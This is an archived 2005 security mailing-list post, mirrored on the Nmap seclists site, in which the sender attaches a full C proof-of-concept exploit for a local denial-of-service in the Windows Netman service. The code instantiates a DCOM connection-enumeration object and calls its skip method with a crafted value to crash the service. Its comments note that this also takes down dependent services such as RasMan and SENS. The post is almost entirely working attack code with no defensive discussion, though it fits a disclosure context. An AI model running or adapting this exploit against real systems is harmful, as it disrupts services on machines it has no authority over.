Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnwatch: Windows Netman Service Local DOS Vulnerability

Windows Netman Service Local DOS Vulnerability

From: bkbll <bkbll_at_cnhonker.net>
Date: Thu, 14 Jul 2005 15:13:48 +0800

Attach is the exploit.

/* Windows Netman Service Local DOS Vulnerability.
 *
 * By bkbll bkbll#cnhonker.net 2005-7-14 2:49下午
 *
 * TESTED ON win2k sp4
 *
 * 因为Netman是通过svchost.exe -k netsvcs启动, 当该服务停止掉后,如下服务也将中止:
 *
 * EventSystem,Irmon,RasMan,NtmsSvc,SENS
 *
 */
#define _WIN32_DCOM

#include <stdio.h>
#include <stdlib.h>
#include <objbase.h>
#include <unknwn.h>
#include <windows.h>

#pragma comment(lib,"ole32")
    
MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E")
VCConnectionManagerEnumConnection //: public IDispatch
{
public:
        virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;
        virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;
        virtual ULONG STDMETHODCALLTYPE Release( void) = 0;
        virtual HRESULT STDMETHODCALLTYPE next(void) = 0;
        virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;
        virtual HRESULT STDMETHODCALLTYPE reset(void) = 0;
        virtual HRESULT STDMETHODCALLTYPE clone(void) = 0;
};
CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
IID IID_IEnumNetConnection = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};

//主函数
main(int argc,char **argv)
{
        VCConnectionManagerEnumConnection *clientcall;
        HRESULT hr;
        
        printf("Windows Netman Service Local DOS Vulnerability..\n\n");
        //初始化
        CoInitializeEx(NULL,COINIT_MULTITHREADED);

        printf("DCOM Client Trying started\n");
        hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall);
        if (hr != S_OK)
        {
                printf("CoCreateInstanceEx failed:%d\n",GetLastError());
                return -1;
        }
        printf("Exploit netman service ....\n");
        hr = clientcall->skip(0x80000001);//(void**)&p);
        if(SUCCEEDED(hr))
        {
                printf("Call client proc Success.\n");
        }
        else
                printf("Call client proc failed:%d\n",GetLastError());
        hr = clientcall->Release();
        CoUninitialize();
        printf("Client exited.\n");
        return 1;
}
Received on Jul 14 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos